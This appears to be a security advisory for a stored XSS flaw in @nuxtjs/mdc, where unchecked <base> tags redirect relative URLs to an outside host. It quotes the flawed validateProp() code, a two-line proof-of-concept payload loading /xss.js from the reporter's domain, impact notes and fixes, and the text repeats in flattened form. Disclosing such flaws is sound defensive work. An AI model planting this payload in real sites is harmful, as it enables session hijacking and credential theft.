Summary
A remote script-inclusion / stored XSS vulnerability in @nuxtjs/mdc lets a Markdown author inject a <base href="https://attacker.tld"> element.
The <base> tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context.
Details
- Affected file :
src/runtime/parser/utils/props.ts
- Core logic :
validateProp() inspects
- attributes that start with
on → blocked
href or src → filtered by isAnchorLinkAllowed()
Every other attribute and every tag (including <base>) is allowed unchanged, so the malicious href on <base> is never validated.
export const validateProp = (attribute: string, value: string) => {
if (attribute.startsWith('on')) return false
if (attribute === 'href' || attribute === 'src') {
return isAnchorLinkAllowed(value)
}
return true // ← “href” on <base> not checked
}
As soon as <base href="https://vozec.fr"> is parsed, any later relative path—/script.js, ../img.png, etc.—is fetched from the attacker’s domain.
Proof of Concept
Place the following in any Markdown handled by Nuxt MDC:
<base href="https://vozec.fr">
<script src="/xss.js"></script>
- Start the Nuxt app (
npm run dev).
- Visit the page.
- The browser requests
https://vozec.fr/xss.js, and whatever JavaScript it returns runs under the vulnerable site’s origin (unless CSP blocks it).
Impact
- Type: Stored XSS via remote script inclusion
- Affected apps: Any Nuxt project using @nuxtjs/mdc to render user-controlled Markdown (blogs, CMSs, docs, comments…).
- Consequences: Full takeover of visitor sessions, credential theft, defacement, phishing, CSRF, or any action executable via injected scripts.
Recommendations
- Disallow or sanitize
<base> tags in the renderer. The safest fix is to strip them entirely.
- Alternatively, restrict
href on <base> to same-origin URLs and refuse protocols like http:, https:, data:, etc. that do not match the current site origin.
- Publish a patched release and document the security fix.
- Until patched, disable raw HTML in Markdown or use an external sanitizer (e.g., DOMPurify) with
FORBID_TAGS: ['base'].
References
Vozec Reporter
Summary
A remote script-inclusion / stored XSS vulnerability in @nuxtjs/mdc lets a Markdown author inject a
<base href="https://attacker.tld">element.The
<base>tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context.Details
src/runtime/parser/utils/props.tsvalidateProp()inspectson→ blockedhreforsrc→ filtered byisAnchorLinkAllowed()Every other attribute and every tag (including
<base>) is allowed unchanged, so the malicioushrefon<base>is never validated.As soon as
<base href="https://vozec.fr">is parsed, any later relative path—/script.js,../img.png, etc.—is fetched from the attacker’s domain.Proof of Concept
Place the following in any Markdown handled by Nuxt MDC:
npm run dev).https://vozec.fr/xss.js, and whatever JavaScript it returns runs under the vulnerable site’s origin (unless CSP blocks it).Impact
Recommendations
<base>tags in the renderer. The safest fix is to strip them entirely.hrefon<base>to same-origin URLs and refuse protocols likehttp:,https:,data:, etc. that do not match the current site origin.FORBID_TAGS: ['base'].References